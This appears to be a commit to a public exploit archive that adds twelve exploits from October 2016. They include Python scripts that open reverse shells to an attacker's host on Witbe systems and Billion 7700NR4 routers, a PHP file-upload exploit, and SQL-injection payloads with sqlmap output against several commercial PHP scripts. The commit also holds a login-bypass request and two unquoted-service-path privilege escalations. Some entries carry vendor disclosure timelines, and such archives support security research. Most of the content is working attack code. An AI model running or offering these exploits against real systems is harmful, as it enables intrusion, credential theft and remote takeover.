DB: 2016-10-07

12 new exploits

phpBB 2.0.10 - Remote Command Execution (CGI)

Advance MLM Script - SQL Injection

Picosafe Web Gui - Multiple Vulnerabilities
Witbe - Remote Code Execution
PHP Classifieds Rental Script - Blind SQL Injection
B2B Portal Script - Blind SQL Injection
MLM Unilevel Plan Script v1.0.2 - SQL Injection
Just Dial Clone Script - SQL Injection
Comodo Dragon Browser - Unquoted Service Path Privilege Escalation
Billion Router 7700NR4 - Remote Command Execution
Comodo Chromodo Browser - Unquoted Service Path Privilege Escalation
Exagate WEBPack Management System - Multiple Vulnerabilities
This commit is contained in:
Offensive Security 2016-10-07 05:01:18 +00:00
parent 5fbed83086
commit cd9e638108
13 changed files with 657 additions and 1 deletions

View file

@ -520,7 +520,7 @@ id,file,description,date,author,platform,type,port
670,platforms/windows/remote/670.c,"Mercury Mail 4.01 - (Pegasus) IMAP Buffer Overflow (2)",2004-12-01,JohnH,windows,remote,143
671,platforms/windows/dos/671.c,"Neverwinter Nights special - Fake Players Denial of Service",2004-12-01,"Luigi Auriemma",windows,dos,0
672,platforms/windows/dos/672.c,"Kreed 1.05 - Format String / Denial of Service",2004-12-02,"Luigi Auriemma",windows,dos,0
673,platforms/php/webapps/673.cgi,"phpBB 2.0.10 - Remote Command Execution (CGI)",2004-12-03,ZzagorR,php,webapps,0
673,platforms/php/webapps/673.pl,"phpBB 2.0.10 - Remote Command Execution (CGI)",2004-12-03,ZzagorR,php,webapps,0
675,platforms/windows/remote/675.txt,"Hosting Controller 0.6.1 Hotfix 1.4 - Directory Browsing",2004-12-05,Mouse,windows,remote,0
676,platforms/php/webapps/676.c,"phpBB 1.0.0 / 2.0.10 - admin_cash.php Remote Exploit",2004-12-05,evilrabbi,php,webapps,0
677,platforms/windows/dos/677.txt,"GetRight 5.2a - Skin File (.grs) Buffer Overflow",2004-12-06,ATmaCA,windows,dos,0
@ -3881,6 +3881,7 @@ id,file,description,date,author,platform,type,port
4226,platforms/windows/remote/4226.html,"Clever Internet ActiveX Suite 6.2 - Arbitrary File Download/Overwrite",2007-07-25,shinnai,windows,remote,0
4227,platforms/windows/dos/4227.php,"PHP - PHP_gd2.dll imagepsloadfont Local Buffer Overflow (PoC)",2007-07-26,r0ut3r,windows,dos,0
4228,platforms/windows/remote/4228.pl,"IPSwitch IMail Server 2006 9.10 - Subscribe Remote Overflow",2007-07-26,ZhenHan.Liu,windows,remote,143
40466,platforms/php/webapps/40466.txt,"Advance MLM Script - SQL Injection",2016-10-06,OoN_Boy,php,webapps,0
4229,platforms/windows/local/4229.pl,"CrystalPlayer 1.98 - '.mls' Local Buffer Overflow",2007-07-26,"Arham Muhammad",windows,local,0
4230,platforms/windows/remote/4230.html,"Nessus Vulnerability Scanner 3.0.6 - ActiveX Remote Delete File Exploit",2007-07-26,h07,windows,remote,0
4231,platforms/aix/local/4231.c,"IBM AIX 5.3 sp6 - capture Terminal Sequence Privilege Escalation",2007-07-27,qaaz,aix,local,0
@ -36575,6 +36576,7 @@ id,file,description,date,author,platform,type,port
40450,platforms/linux/local/40450.txt,"Apache Tomcat 8/7/6 (Debian-Based Distros) - Privilege Escalation",2016-10-03,"Dawid Golunski",linux,local,0
40451,platforms/win_x86-64/local/40451.rb,"Street Fighter 5 - 'Capcom.sys' Kernel Execution (Metasploit)",2016-10-03,"OJ Reeves",win_x86-64,local,0
40452,platforms/windows/remote/40452.py,"Disk Pulse Enterprise 9.0.34 - Buffer Overflow",2016-10-03,Tulpa,windows,remote,80
40454,platforms/php/webapps/40454.txt,"Picosafe Web Gui - Multiple Vulnerabilities",2016-10-05,"Shahab Shamsi",php,webapps,0
40455,platforms/windows/remote/40455.py,"VX Search Enterprise 9.0.26 - Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
40456,platforms/windows/remote/40456.py,"Sync Breeze Enterprise 8.9.24 - Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
40457,platforms/windows/remote/40457.py,"Dup Scout Enterprise 9.0.28 - Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
@ -36582,3 +36584,12 @@ id,file,description,date,author,platform,type,port
40459,platforms/windows/remote/40459.py,"Disk Savvy Enterprise 9.0.32 - Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
40460,platforms/windows/local/40460.txt,"Abyss Web Server X1 2.11.1 - Unquoted Service Path Privilege Escalation",2016-10-05,Tulpa,windows,local,0
40461,platforms/windows/local/40461.txt,"Fortitude HTTP 1.0.4.0 - Unquoted Service Path Privilege Escalation",2016-10-05,Tulpa,windows,local,0
40462,platforms/cgi/webapps/40462.py,"Witbe - Remote Code Execution",2016-10-05,BeLmar,cgi,webapps,0
40467,platforms/php/webapps/40467.txt,"PHP Classifieds Rental Script - Blind SQL Injection",2016-10-06,OoN_Boy,php,webapps,0
40468,platforms/php/webapps/40468.txt,"B2B Portal Script - Blind SQL Injection",2016-10-06,OoN_Boy,php,webapps,0
40469,platforms/php/webapps/40469.txt,"MLM Unilevel Plan Script v1.0.2 - SQL Injection",2016-10-06,N4TuraL,php,webapps,0
40470,platforms/php/webapps/40470.txt,"Just Dial Clone Script - SQL Injection",2016-10-06,OoN_Boy,php,webapps,0
40471,platforms/windows/local/40471.txt,"Comodo Dragon Browser - Unquoted Service Path Privilege Escalation",2016-10-06,@Th3GundY,windows,local,0
40472,platforms/hardware/remote/40472.py,"Billion Router 7700NR4 - Remote Command Execution",2016-10-06,R-73eN,hardware,remote,0
40473,platforms/windows/local/40473.txt,"Comodo Chromodo Browser - Unquoted Service Path Privilege Escalation",2016-10-06,@Th3GundY,windows,local,0
40474,platforms/hardware/remote/40474.txt,"Exagate WEBPack Management System - Multiple Vulnerabilities",2016-10-06,"Halil Dalabasmaz",hardware,remote,0

Can't render this file because it is too large.

39
platforms/cgi/webapps/40462.py Executable file
View file

@ -0,0 +1,39 @@
#!/usr/bin/python
# Exploit Title: Witbe RCE (Remote Code Execution)
# Exploit Author: BeLmar
# Date: 05/10/2016
# DEMO : https://youtu.be/ooUFXfUfIs0
# Contact : hb.mz093@gmail.com
# Vendor Homepage: http://www.witbe.net
# Tested on: Windows7/10 & BackBox
# Category: Remote Exploits
import urllib
import urllib2
import os
print " M MW M M XXMMrX, 2Mr72S MW7XS"
print " MM MM M2 M SM MM MM M "
print " M M ZM M M XM MMir0M MMrXS"
print " MM M M M: M SM MM ZM M2 "
print " MMa MMM M ZM MM XM M "
print " XM M M iM 8MZ8W8 MM8BB"
print " EXPLOIT BY BELMAR "
print ""
print "Run NetCat Listner" # First Run Netcat Listner
rhost = raw_input('RHOST: ')
lhost = raw_input('LHOST: ')
lport = raw_input('LPORT: ')
url = 'http://'+rhost+'/cgi-bin/applyConfig.pl'
user_agent = 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36'
values = {'auth_login': '', #Leave it as it is
'auth_pwd': '', #Leave it as it is
'file': 'set|bash -i >& /dev/tcp/'+lhost+'/'+lport+' 0>&1' }
data = urllib.urlencode(values)
req = urllib2.Request(url, data)
response = urllib2.urlopen(req)
the_page = response.read()

View file

@ -0,0 +1,69 @@
# Title : Billion Router 7700NR4 Remote Root Command Execution
# Date : 06/10/2016
# Author : R-73eN
# Tested on: Billion Router 7700NR4
# Vendor : http://www.billion.com/
# Vulnerability Description:
# This router is a widely used here in Albania. It is given by a telecom provider to the home and bussiness users.
# The problem is that this router has hardcoded credentials which "can not be changed" by a normal user. Using these
# credentials we don't have to much access but the lack of authentication security we can download the backup and get the admin password.
# Using that password we can login to telnet server and use a shell escape to get a reverse root connection.
# You must change host with the target and reverse_ip with your attacking ip.
# Fix:
# The only fix is hacking your router with this exploit, changing the credentials and disabling all the other services using iptables.
#
import requests
import base64
import socket
import time
host = ""
def_user = "user"
def_pass = "user"
reverse_ip = ""
#Banner
banner = ""
banner +=" ___ __ ____ _ _ \n"
banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"
banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"
banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"
banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n"
print banner
# limited shell escape
evil = 'ping ;rm /tmp/backpipe;cd tmp;echo "mknod backpipe p && nc ' + reverse_ip + ' 1337 0<backpipe | /bin/sh 1>backpipe &" > /tmp/rev.sh;chmod +x rev.sh;sh /tmp/rev.sh &'
def execute_payload(password):
print "[+] Please run nc -lvp 1337 and then press any key [+]"
raw_input()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,23))
s.recv(1024)
s.send("admin\r")
a= s.recv(1024)
time.sleep(1)
s.send(password +"\r")
time.sleep(1)
s.recv(1024)
s.send(evil + "\r")
time.sleep(1)
print "[+] If everything worked you should get a reverse shell [+]"
print "[+] Warning pressing any key will close the SHELL [+]"
raw_input()
r = requests.get("http://" + host + "/backupsettings.conf" , auth=(def_user,def_pass))
if(r.status_code == 200):
print "[+] Seems the exploit worked [+]"
print "[+] Dumping data . . . [+]"
temp = r.text
admin_pass = temp.split("<AdminPassword>")[1].split("</AdminPassword>")[0]
# print "[+] Admin password : " + str(base64.b64decode(admin_pass)) + " [+]"
execute_payload(str(base64.b64decode(admin_pass)))
else:
print "[-] Exploit Failed [-]"
print "\n[+] https://www.infogen.al/ [+]\n\n"

View file

@ -0,0 +1,100 @@
Document Title:
================
Exagate WEBpack Management System Multiple Vulnerabilities
Author:
========
Halil Dalabasmaz
Release Date:
==============
07 OCT 2016
Product & Service Introduction:
================================
WEBPack is the individual built-in user-friendly and skilled web
interface allowing web-based access to the main units of the SYSGuard
and POWERGuard series. The advanced software enables the users to
design their customized dashboard smoothly for a detailed monitoring
and management of all the power outlet sockets & sensor and volt free
contact ports, as well as relay outputs. User definition and authorization,
remote access and update, detailed reporting and archiving are among the
many features.
Vendor Homepage:
=================
http://www.exagate.com/
Vulnerability Information:
===========================
Exagate company uses WEBPack Management System software on the hardware.
The software is web-based and it is provide control on the hardware. There are
multiple vulnerabilities on that software.
Vulnerability #1: SQL Injection
================================
There is no any filtering or validation mechanisim on "login.php". "username"
and "password" inputs are vulnerable to SQL Injection attacks. Sample POST
request is given below.
POST /login.php HTTP/1.1
Host: <TARGET HOST>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 37
username=root&password=' or 1=1--
Vulnerability #2: Unauthorized Access To Sensetive Information
===============================================================
The software is capable of sending e-mail to system admins. But there is no
any authorization mechanism to access e-mail logs. The e-mail logs can accessable
anonymously from "http://<TARGET HOST>/emaillog.txt".
Vulnerability #3: Unremoved Configuration Files
================================================
The software contains the PHP Info file on the following URL.
http://<TARGET HOST>/api/phpinfo.php
Vulnerability Disclosure Timeline:
==================================
03 OCT 2016 - Attempted to contact vendor after discovery of vulnerabilities
06 OCT 2016 - No response from vendor and re-attempted to contact vendor
07 OCT 2016 - No response from vendor
07 OCT 2016 - Public Disclosure
Discovery Status:
==================
Published
Affected Product(s):
=====================
Exagate SYSGuard 3001 (Most probably all Exagate hardwares affected that vulnerabilities)
Tested On:
===========
Exagate SYSGuard 3001
Disclaimer & Information:
==========================
The information provided in this advisory is provided as it is without
any warranty. BGA disclaims all warranties, either expressed or implied,
including the warranties of merchantability and capability for a particular
purpose. BGA or its suppliers are not liable in any case of damage, including
direct, indirect, incidental, consequential loss of business profits or
special damages.
Domain: www.bgasecurity.com
Social: twitter.com/bgasecurity
Contact: advisory@bga.com.tr
Copyright © 2016 | BGA Security LLC

65
platforms/php/webapps/40454.txt Executable file
View file

@ -0,0 +1,65 @@
[-] Title : Picosafe Web Gui - Multiple Vulnerabilities
[-] Author : Shahab Shamsi
[-] Vendor : https://github.com/embeddedprojects/picosafe_webgui
[-] Category : Webapps
[-] Date : 01.October.2016
Vulnerable page :
picosafe_webgui/webinterface/js/filemanager/filemanager.php
==========================
| Remote File Upload :
==========================
Vulnerable Source (RFU) :
52: chmod($to, 0755);
48: $to = realpath($curdir) . '/' . $name;
40: function uploadfile($curdir)
46: $name = $_FILES['files']['name'][0];
Exploit :
<?php
$uploadfile="YourFileName";
$ch = curl_init("http://localhost:8282/picosafe_webgui/webinterface/js/filemanager/filemanager.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('file'=>"@$uploadfile"));
curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
curl_close($ch);
print "$result";
?>
Location :
http://localhost:8282/picosafe_webgui/webinterface/js/filemanager/FileName
==========================
| Local File Disclosure :
==========================
Vulnerable Source (LFD) :
17: $file = base64_decode($_GET['file']);
18: DownloadFile($file);
111: readfile($file);
POC :
http://localhost:8282/picosafe_webgui/webinterface/js/filemanager/filemanager.php?file=base64code-Filename
==========================
| Cross-Site Scripting :
==========================
Vulnerable Source (XSS) :
8: echo json_encode($data);
7: $data = sortfiles($data);
6: $data = listdirectory($directory);
5: $directory = base64_decode($_GET['directory']);
POC :
http://localhost:8282/picosafe_webgui/webinterface/js/filemanager/filemanager.php?directory=Base64-ScriptingCode

60
platforms/php/webapps/40466.txt Executable file
View file

@ -0,0 +1,60 @@
[x]========================================================================================================================================[x]
| Title : Advance MLM Script SQL Vulnerabilities
| Software : Advance MLM Script
| Vendor : http://www.i-netsolution.com/
| Demo : http://www.i-netsolution.com/item/advance-mlm-script/live_demo/236431
| Google Dork : news_detail.php?newid= © MLM SCRIPT
| Date : 06 October 2016
| Author : OoN_Boy
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Technology : PHP
| Database : MySQL
| Price : $ 199
| Description : MLM business upward day by day, Open Source MLM Script plays an important role for successful multilevel marketing business.
Our advanced featured PHP MLM Script enables MLM companies to manage and run their express selling business more effectively towards a successful way.
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Exploit : http://localhost/mlm/news_detail.php?newid=%Inject_Here%26
| Aadmin Page : http://localhost/[path]/admin/index.php
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Proof of concept : sqlmap -u "http://localhost/mlm/news_detail.php?newid=26" --invalid-string
[x]========================================================================================================================================[x]
---
Parameter: newid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: newid=26' AND 4440=4440 AND 'AJmz'='AJmz
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: newid=26' OR SLEEP(5) AND 'FokP'='FokP
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: newid=jMCtRq' UNION ALL SELECT NULL,CONCAT(0x71787a7a71,0x48755652787877617966627661486164744748424b6155564f514370537747504c6e736876665150,0x7178787171),NULL,NULL,NULL,NULL-- Afye
---
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Greetz : antisecurity.org batamhacker.or.id
| Vrs-hCk NoGe Jack zxvf Angela Zhang aJe H312Y yooogy mousekill }^-^{ martfella noname s4va
| k1tk4t str0ke kaka11 ^s0n g0ku^ Joe Chawanua Ntc xx_user s3t4n IrcMafia em|nem Pandoe Ronny rere
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Hi All long time no see ^_^
[x]========================================================================================================================================[x]

61
platforms/php/webapps/40467.txt Executable file
View file

@ -0,0 +1,61 @@
[x]========================================================================================================================================[x]
| Title : PHP Classifieds Rental Script Blind SQL Vulnerabilities
| Software : PHP Classifieds Rental Script
| Vendor : http://www.i-netsolution.com/
| Demo : http://www.i-netsolution.com/item/php-classifieds-rental-script/244993
| Date : 06 October 2016
| Author : OoN_Boy
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Technology : PHP
| Database : MySQL
| Price : $ 99
| Description : PHP Classifieds Rental Script The PHP Rental Classifieds Script is one among the limited software's, which are designed
so user-friendly that anyone with minimal knowledge of operating a computer can utilize it to its optimum. Besides being
an easy-to- use software, this Property Rental Script
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Exploit : http://localhost/product_details.php?refid=%Inject_Here%1319258872
| Aadmin Page : http://localhost/[path]/admin/index.php
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Proof of concept : sqlmap -u "http://localhost/product_details.php?refid=1319258872" --invalid-string
[x]========================================================================================================================================[x]
---
Parameter: refid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: refid=1319258872' AND 3912=3912 AND 'HTMi'='HTMi
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: refid=1319258872' OR SLEEP(5) AND 'QwXZ'='QwXZ
Type: UNION query
Title: MySQL UNION query (NULL) - 26 columns
Payload: refid=xCUcyB' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a787671,0x644e6e5046537647684864705a527667796f454c666c4656644a73506d4e627a48574969424a4756,0x7176786271),NULL,NULL,NULL,NULL,NULL#
---
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Greetz : antisecurity.org batamhacker.or.id
| Vrs-hCk NoGe Jack zxvf Angela Zhang aJe H312Y yooogy mousekill }^-^{ martfella noname s4va
| k1tk4t str0ke kaka11 ^s0n g0ku^ Joe Chawanua Ntc xx_user s3t4n IrcMafia em|nem Pandoe Ronny rere
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Hi All long time no see ^_^
[x]========================================================================================================================================[x]

61
platforms/php/webapps/40468.txt Executable file
View file

@ -0,0 +1,61 @@
[x]========================================================================================================================================[x]
| Title : B2B Portal Script Blind SQL Vulnerabilities
| Software : B2B Portal Script
| Vendor : http://www.i-netsolution.com/
| Demo : http://www.i-netsolution.com/item/b2b-portal-script/live_demo/190275
| Date : 06 October 2016
| Author : OoN_Boy
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Technology : PHP
| Database : MySQL
| Price : $ 249
| Description : Have an idea about starting your own Alibaba clone website and thinking how to implement it? Our B2B Portal Script
is the platform to transform your idea into the practical world. It is developed in PHP and MySQL and can help global
portals to manage their online transactions with efficiency
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Exploit : http://localhost/advancedb2b/view-product.php?pid=294'
| Aadmin Page : http://localhost/[path]/admin/index.php
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Proof of concept : sqlmap -u "http://localhost/advancedb2b/view-product.php?pid=294"
[x]========================================================================================================================================[x]
---
Parameter: pid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pid=294' AND 1754=1754 AND 'whqn'='whqn
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: pid=294' AND SLEEP(5) AND 'nGqC'='nGqC
Type: UNION query
Title: Generic UNION query (NULL) - 33 columns
Payload: pid=294' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178766b71,0x656f5962547177636a47435158754754736267535a4d515a4d4c454e535052496652505243795849,0x7176626271),NULL,NULL-- lwGp
---
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Greetz : antisecurity.org batamhacker.or.id
| Vrs-hCk NoGe Jack zxvf Angela Zhang aJe H312Y yooogy mousekill }^-^{ martfella noname s4va
| k1tk4t str0ke kaka11 ^s0n g0ku^ Joe Chawanua Ntc xx_user s3t4n IrcMafia em|nem Pandoe Ronny rere
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Hi All long time no see ^_^
[x]========================================================================================================================================[x]

44
platforms/php/webapps/40469.txt Executable file
View file

@ -0,0 +1,44 @@
######################
# Application Name : MLM Unilevel Plan Script v1.0.2
# Exploit Author : Cyber Warrior | Bug Researchers Group | N4TuraL
# Author Contact : https://twitter.com/byn4tural
# Vendor Homepage : http://www.i-netsolution.com/
# Vulnerable Type : SQL Injection
# Date : 2016-10-06
# Tested on : Windows 10 / Mozilla Firefox
# Linux / Mozilla Firefox
# Linux / sqlmap 1.0.6.28#dev
###################### SQL Injection Vulnerability ######################
# Location :
http://localhost/[path]/news_detail.php
######################
# PoC Exploit:
http://localhost/[path]/news_detail.php?newid=11%27%20%2F*%2130000and%20ascii%28substring%28%28database%28%29%29%2C4%2C1%29%29%3C115%20and*%2F%20%27x%27%3D%27x
# Exploit Code via sqlmap:
sqlmap -u http://localhost/[path]/news_detail.php?newid=11 --dbs
---
Parameter: newid (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: newid=11' AND SLEEP(5) AND 'HheB'='HheB
---
[18:47:12] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.12
######################

40
platforms/php/webapps/40470.txt Executable file
View file

@ -0,0 +1,40 @@
[x]========================================================================================================================================[x]
| Title : Just Dial Clone Script SQL & XSS Vulnerabilities
| Software : Just Dial Clone
| Vendor : http://www.i-netsolution.com/
| Demo : http://www.i-netsolution.com/item/just-dial-clone/live_demo/423618
| Date : 06 October 2016
| Author : OoN_Boy
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Technology : PHP
| Database : MySQL
| Price : $ 299
| Description : If you wish to launch your own business directory website, we have a readymade solution for you which supports unlimited
categories, uses and secure code. Our Company Catalogue Listing Script is just the right script for you
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Exploit : http://localhost/jus/restaurants-details.php?fid=%Inject_Here%21
| Admin Page : http://localhost/[path]/admin/index.php
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Proof of concept SQL : http://localhost/jus/restaurants-details.php?fid=%Inject_Here%21
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Greetz : antisecurity.org batamhacker.or.id
| Vrs-hCk NoGe Jack zxvf Angela h4ntu reel dono Zhang aJe H312Y yooogy mousekill }^-^{ martfella noname s4va
| k1tk4t str0ke kaka11 ^s0n g0ku^ Joe Chawanua Ntc xx_user s3t4n IrcMafia em|nem Pandoe Ronny rere
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Hi All long time no see ^_^
[x]========================================================================================================================================[x]

View file

@ -0,0 +1,53 @@
# Exploit Title: Comodo Dragon Browser Unquoted Service Path Privilege Escalation
# Date: 24/09/2016
# Author: Yunus YILDIRIM (@Th3GundY)
# Team: CT-Zer0 (@CRYPTTECH)
# Website: http://yildirimyunus.com
# Contact: yunusyildirim@protonmail.com
# Category: local
# Vendor Homepage: https://www.comodo.com
# Software Link: https://www.comodo.com/home/browsers-toolbars/browser.php
# Version: Software Version <= 52.15.25.663
# Tested on: Windows 7 x86/x64
1. Description
Comodo Dragon Browser Update Service (DragonUpdater) installs as a service with
an unquoted service path running with SYSTEM privileges.
This could potentially allow an authorized but non-privileged local
user to execute arbitrary code with elevated privileges on the system.
2. Proof of Concept
C:\>sc qc DragonUpdater
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: DragonUpdater
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Comodo\Dragon\dragon_updater.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : COMODO Dragon Update Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
3. Exploit:
A successful attempt would require the local attacker must insert an executable file
in the path of the service.
Upon service restart or system reboot, the malicious code will be run with elevated privileges.
Additional notes :
Fixed in version 52.15.25.664
https://forums.comodo.com/news-announcements-feedback-cd/comodo-dragon-v521525664-is-now-available-for-download-t116786.0.html
Vulnerability Disclosure Timeline:
=========================
24/09/2016 - Contact With Vendor
26/09/2016 - Vendor Response
03/10/2016 - Release Fixed Version

View file

@ -0,0 +1,53 @@
# Exploit Title: Comodo Chromodo Browser Unquoted Service Path Privilege Escalation
# Date: 03/10/2016
# Author: Yunus YILDIRIM (@Th3GundY)
# Team: CT-Zer0 (@CRYPTTECH)
# Website: http://yildirimyunus.com
# Contact: yunusyildirim@protonmail.com
# Category: local
# Vendor Homepage: https://www.comodo.com
# Software Link: https://www.comodo.com/home/browsers-toolbars/chromodo-private-internet-browser.php
# Version: Software Version <= 52.15.25.664
# Tested on: Windows 7 x86/x64
1. Description
Comodo Chromodo Browser Update Service (ChromodoUpdater) installs as a service with
an unquoted service path running with SYSTEM privileges.
This could potentially allow an authorized but non-privileged local
user to execute arbitrary code with elevated privileges on the system.
2. Proof of Concept
C:\>sc qc ChromodoUpdater
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: ChromodoUpdater
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Comodo\Chromodo\chromodo_updater.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : COMODO Chromodo Update Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
3. Exploit:
A successful attempt would require the local attacker must insert an executable file
in the path of the service.
Upon service restart or system reboot, the malicious code will be run with elevated privileges.
Additional notes :
Fixed in version 52.15.25.665
https://forums.comodo.com/news-announcements-feedback-cd/chromodo-v521525665-is-now-available-for-download-t116787.0.html
Vulnerability Disclosure Timeline:
=========================
03/10/2016 - Contact With Vendor
03/10/2016 - Vendor Response
05/10/2016 - Release Fixed Version